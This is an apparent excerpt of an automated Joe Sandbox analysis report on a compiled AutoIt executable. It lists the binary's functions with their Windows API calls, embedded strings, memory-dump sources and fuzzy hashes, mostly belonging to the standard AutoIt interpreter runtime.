Part of subcall function 00E03A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E03AC0
Part of subcall function 00E03A46: RegisterClassExW.USER32(?), ref: 00E03B16

Part of subcall function 00E039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E03A03
Part of subcall function 00E039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E03A24
Part of subcall function 00E039D5: ShowWindow.USER32(00000000,?,?), ref: 00E03A38
Part of subcall function 00E039D5: ShowWindow.USER32(00000000,?,?), ref: 00E03A41

Part of subcall function 00E0434A: _memset.LIBCMT ref: 00E04370
Part of subcall function 00E0434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E04415

Strings

This is a third-party compiled AutoIt script., xrefs: 00E3D279
runas, xrefs: 00E3D33A
%, xrefs: 00E03C44

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%
API String ID: 529118366-3343222573
Opcode ID: 95248a4b7825683a431c318a0a2a57df322215b1adb5aa8c1213566887730fd9
Instruction ID: 9fda29f55d59d5a8b82ce0e6c99499a0894d2a763eaaca82c67fb3878b361560
Opcode Fuzzy Hash: 95248a4b7825683a431c318a0a2a57df322215b1adb5aa8c1213566887730fd9
Instruction Fuzzy Hash: 2A510A71D08208AEDB05EBB5DC45EEEBBF8AB45704F106069F451B21F1CA7166CACB20

Function 00E049A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00E049CD

Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06

GetCurrentProcess.KERNEL32(?,00E8FAEC,00000000,00000000,?), ref: 00E04A9A
IsWow64Process.KERNEL32(00000000), ref: 00E04AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00E04AE7
FreeLibrary.KERNEL32(00000000), ref: 00E04AF2
GetSystemInfo.KERNEL32(00000000), ref: 00E04B23
GetSystemInfo.KERNEL32(00000000), ref: 00E04B2F

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 4be6b7e2efe9ef81aa0acaffa2d6740cfad10fc54b9c1ea19405e4e437119f7e
Instruction ID: 5b000cb40289bb3c9cbb993d025fafe3ff17d309928bec463a3aee695790250f
Opcode Fuzzy Hash: 4be6b7e2efe9ef81aa0acaffa2d6740cfad10fc54b9c1ea19405e4e437119f7e
Instruction Fuzzy Hash: 859127B198D7C0DECB31CB7895541AAFFF4AF29300F44599ED1CBA3A81D220B948C719

Function 00E04E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00E04D8E,?,?,00000000,00000000), ref: 00E04E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E04D8E,?,?,00000000,00000000), ref: 00E04EB0
LoadResource.KERNEL32(?,00000000,?,?,00E04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00E04E2F), ref: 00E3D937
SizeofResource.KERNEL32(?,00000000,?,?,00E04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00E04E2F), ref: 00E3D94C
LockResource.KERNEL32(00E04D8E,?,?,00E04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00E04E2F,00000000), ref: 00E3D95F

Strings

SCRIPT, xrefs: 00E04EA6

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 9c29fecc5c056a30085d587a1c4dca79500c597e4f3e09c548ac4847634730eb
Instruction ID: c32002b434ba44d1dcd274f2dfb435c10d939bd8c6624687f188e18c71cd5303
Opcode Fuzzy Hash: 9c29fecc5c056a30085d587a1c4dca79500c597e4f3e09c548ac4847634730eb
Instruction Fuzzy Hash: 0A1151B5240700BFD7258B65ED48F677BB9FBC5711F104268F509EA1A0DB61E8458660

Function 00E0E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

Dd, xrefs: 00E0EAC1
Dd, xrefs: 00E43AF5
Variable must be of type 'Object'., xrefs: 00E43E62
Dd, xrefs: 00E43B2E
Dd, xrefs: 00E0EABA

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID:
String ID: Dd$Dd$Dd$Dd$Variable must be of type 'Object'.
API String ID: 0-2781164977
Opcode ID: f9142fd41e811ed7d924fd093e108b91de059255a305c62831e22026b4a010cf
Instruction ID: d66a42e429a2f31a9bdaaa613909c982cfdb0af42146da5fc641361f3f7bca53
Opcode Fuzzy Hash: f9142fd41e811ed7d924fd093e108b91de059255a305c62831e22026b4a010cf
Instruction Fuzzy Hash: E7A27D75A00205CFCB28CF54D480AAAB7F2FF58314F689869E955BB391D731ED82CB91

Function 00E6445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00E3E398), ref: 00E6446A
FindFirstFileW.KERNELBASE(?,?), ref: 00E6447B
FindClose.KERNEL32(00000000), ref: 00E6448B

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 7fcbc5f754eb5cc986599f4f64a450cbb87c6a02824a56bf0b52694421190e51
Instruction ID: 95154051f1d591a31771108aee8c3dfd4df47aadc882e1c892f62fde3936e819
Opcode Fuzzy Hash: 7fcbc5f754eb5cc986599f4f64a450cbb87c6a02824a56bf0b52694421190e51
Instruction Fuzzy Hash: 2AE0D8724109006F42106B38FC0E4E9775C9F45375F100715F839E10E0EB7499049695

Function 00E109D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E10A5B
timeGetTime.WINMM ref: 00E10D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E10E53
Sleep.KERNEL32(0000000A), ref: 00E10E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00E10EFA
DestroyWindow.USER32 ref: 00E10F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E10F20
Sleep.KERNEL32(0000000A,?,?), ref: 00E44E83
TranslateMessage.USER32(?), ref: 00E45C60
DispatchMessageW.USER32(?), ref: 00E45C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E45C82

Strings

@GUI_CTRLID, xrefs: 00E44F3A
pb, xrefs: 00E44FAE
pb, xrefs: 00E457B4
@TRAY_ID, xrefs: 00E4578F
@GUI_CTRLHANDLE, xrefs: 00E44FE4
@GUI_WINHANDLE, xrefs: 00E44F8F
pb, xrefs: 00E44F59
pb, xrefs: 00E45003
@COM_EVENTOBJ, xrefs: 00E454F0

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb$pb$pb$pb
API String ID: 4212290369-1420604165
Opcode ID: 2eb463900010f909d89f9c1bbe4fd3afc911e22d5978452cc8ca6fd9f914e924
Instruction ID: b1309267243e80ca16d80610b5b9b92da2ef1110d7e5d822ba95adc9210452e8
Opcode Fuzzy Hash: 2eb463900010f909d89f9c1bbe4fd3afc911e22d5978452cc8ca6fd9f914e924
Instruction Fuzzy Hash: A7B2C471608741DFD728DF24D884BAAB7E4BF84304F14591DE59AB72A2CB71E8C5CB82

Function 00E69155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E68F5F: __time64.LIBCMT ref: 00E68F69

Part of subcall function 00E04EE5: _fseek.LIBCMT ref: 00E04EFD

__wsplitpath.LIBCMT ref: 00E69234

Part of subcall function 00E240FB: __wsplitpath_helper.LIBCMT ref: 00E2413B

_wcscpy.LIBCMT ref: 00E69247
_wcscat.LIBCMT ref: 00E6925A
__wsplitpath.LIBCMT ref: 00E6927F
_wcscat.LIBCMT ref: 00E69295
_wcscat.LIBCMT ref: 00E692A8

Part of subcall function 00E68FA5: _memmove.LIBCMT ref: 00E68FDE
Part of subcall function 00E68FA5: _memmove.LIBCMT ref: 00E68FED

_wcscmp.LIBCMT ref: 00E691EF

Part of subcall function 00E69734: _wcscmp.LIBCMT ref: 00E69824
Part of subcall function 00E69734: _wcscmp.LIBCMT ref: 00E69837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E69452
_wcsncpy.LIBCMT ref: 00E694C5
DeleteFileW.KERNEL32(?,?), ref: 00E694FB
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E69511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E69522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E69534

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 9228f6a1b79af3d2016b3dce7c488ce2e742a47517e8186a2fef0f8308bc8056
Instruction ID: 429923671888fb6bcac87dd78e30a379128b4875f30a3385bf2202ff10097571
Opcode Fuzzy Hash: 9228f6a1b79af3d2016b3dce7c488ce2e742a47517e8186a2fef0f8308bc8056
Instruction Fuzzy Hash: 1CC15DB1D40229AACF11DF95DC81ADEB7BCEF45350F0050AAF609F7191DB309A848F61

Function 00E0301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00E03074
RegisterClassExW.USER32(00000030), ref: 00E0309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E030AF
InitCommonControlsEx.COMCTL32(?), ref: 00E030CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E030DC
LoadIconW.USER32(000000A9), ref: 00E030F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E03101

Strings

0, xrefs: 00E03056
+, xrefs: 00E0305D
AutoIt v3 GUI, xrefs: 00E03090
TaskbarCreated, xrefs: 00E030A4

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: a9de21c6c7edf63e5b27ea9d5548fa05846a18b9eaa864d5ca58b35c84c1f4bd
Instruction ID: 88ca76c1caa4446e10bf2500769895e72eee86f1b01b5be50248d94c9758a3bb
Opcode Fuzzy Hash: a9de21c6c7edf63e5b27ea9d5548fa05846a18b9eaa864d5ca58b35c84c1f4bd
Instruction Fuzzy Hash: A03169B2841309AFDB408FA5DC49ACDBBF4FB08310F10412AE544F62A0D3B6158ACF50

Function 00E03041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00E03074
RegisterClassExW.USER32(00000030), ref: 00E0309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E030AF
InitCommonControlsEx.COMCTL32(?), ref: 00E030CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E030DC
LoadIconW.USER32(000000A9), ref: 00E030F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E03101

Strings

0, xrefs: 00E03056
+, xrefs: 00E0305D
AutoIt v3 GUI, xrefs: 00E03090
TaskbarCreated, xrefs: 00E030A4

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: a4a7dd29229ba6af95f4c73a987a004b39f39684df8fab6403146250970e78c6
Instruction ID: 332379660f03ebb88da2d8e1a8173bc027910bc3f0f738bd0383d308bed45fac
Opcode Fuzzy Hash: a4a7dd29229ba6af95f4c73a987a004b39f39684df8fab6403146250970e78c6
Instruction Fuzzy Hash: 1721F7B2911308AFEB00DFA6EC49B9DBBF4FB08700F10412AF515B62A0D7B255898F91

Function 00E0708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E04706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00EC52F8,?,00E037AE,?), ref: 00E04724

Part of subcall function 00E2050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E07165), ref: 00E2052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E071A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E3E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E3E909
RegCloseKey.ADVAPI32(?), ref: 00E3E947
_wcscat.LIBCMT ref: 00E3E9A0

Strings

Software\AutoIt v3\AutoIt, xrefs: 00E0719E
\, xrefs: 00E3E9C3
\Include\, xrefs: 00E07165
Include, xrefs: 00E3E8BF, 00E3E900

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 005a73450b6f701a43ab60c1a03c192ab2d7504590c5ee0c0855a9cbca044786
Instruction ID: b35296fc397740bd9e557bc56e2578bda7facf8f9fe44b1a74f55c9f26d7c80d
Opcode Fuzzy Hash: 005a73450b6f701a43ab60c1a03c192ab2d7504590c5ee0c0855a9cbca044786
Instruction Fuzzy Hash: 40716F715083019EC708EF66E841D9BBBE8FF85310F40692EF585B72B1DB729989CB52

Function 00E03633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00E036D2
KillTimer.USER32(?,00000001), ref: 00E036FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E0371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E0372A
CreatePopupMenu.USER32 ref: 00E0373E
PostQuitMessage.USER32(00000000), ref: 00E0374D

Strings

%, xrefs: 00E3D081, 00E3D0CF
TaskbarCreated, xrefs: 00E03725

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%
API String ID: 129472671-3835587964
Opcode ID: 5b32af345430d336cfbb0850f16a6202877cc89d10a86d4dd6886c01a289e77c
Instruction ID: 602225968ae329b23b040c2fe04da0ae2a04bd61e4e9e701cad30c98b4965094
Opcode Fuzzy Hash: 5b32af345430d336cfbb0850f16a6202877cc89d10a86d4dd6886c01a289e77c
Instruction Fuzzy Hash: 284129B3114505AFDB189F78EC09FBA379DEB44300F54213AF602B62E2C663A9D59761

Function 00E03A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00E03A50
LoadCursorW.USER32(00000000,00007F00), ref: 00E03A5F
LoadIconW.USER32(00000063), ref: 00E03A76
LoadIconW.USER32(000000A4), ref: 00E03A88
LoadIconW.USER32(000000A2), ref: 00E03A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E03AC0
RegisterClassExW.USER32(?), ref: 00E03B16

Part of subcall function 00E03041: GetSysColorBrush.USER32(0000000F), ref: 00E03074
Part of subcall function 00E03041: RegisterClassExW.USER32(00000030), ref: 00E0309E
Part of subcall function 00E03041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E030AF
Part of subcall function 00E03041: InitCommonControlsEx.COMCTL32(?), ref: 00E030CC
Part of subcall function 00E03041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E030DC
Part of subcall function 00E03041: LoadIconW.USER32(000000A9), ref: 00E030F2
Part of subcall function 00E03041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E03101

Strings

#, xrefs: 00E03AFB
0, xrefs: 00E03AF4
AutoIt v3, xrefs: 00E03B05

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: f285c4fd5a84b203cb0077174a557afb8e84355d7cfcd30d1ee95618bb6c7cbd
Instruction ID: 69aebdeae87edde557c1db1b2043f16f242cb6d26c60082a7e74f32312b37622
Opcode Fuzzy Hash: f285c4fd5a84b203cb0077174a557afb8e84355d7cfcd30d1ee95618bb6c7cbd
Instruction Fuzzy Hash: 4121F572910308AFEB14DFA6EC49B9D7BF4EB08711F10012AF504B62B1D7B666998F94

Function 00E03766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00E037AE
CMDLINERAW, xrefs: 00E037FB
R, xrefs: 00E3D213
CMDLINE, xrefs: 00E03822
/ErrorStdOut, xrefs: 00E0387D
/AutoIt3OutputDebug, xrefs: 00E03892
/AutoIt3ExecuteLine, xrefs: 00E038A7
/AutoIt3ExecuteScript, xrefs: 00E038BC

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R
API String ID: 1825951767-347772802
Opcode ID: ad9f91ec9c3a7a285f02077735a2d81ad615b8ce2cdcbd4b47340b596b01c132
Instruction ID: 192eb85c1968730264a4b75eabd22cc378f78f6e27086fff5053705a8a75955f
Opcode Fuzzy Hash: ad9f91ec9c3a7a285f02077735a2d81ad615b8ce2cdcbd4b47340b596b01c132
Instruction Fuzzy Hash: D6A16C7291022D9ACB05EBA0DC95EEEB7B8FF54300F442529F416B71D2DF746A89CB60

Function 00E0F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E20162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E20193
Part of subcall function 00E20162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E2019B
Part of subcall function 00E20162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E201A6
Part of subcall function 00E20162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E201B1
Part of subcall function 00E20162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E201B9
Part of subcall function 00E20162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E201C1

Part of subcall function 00E160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E0F930), ref: 00E16154

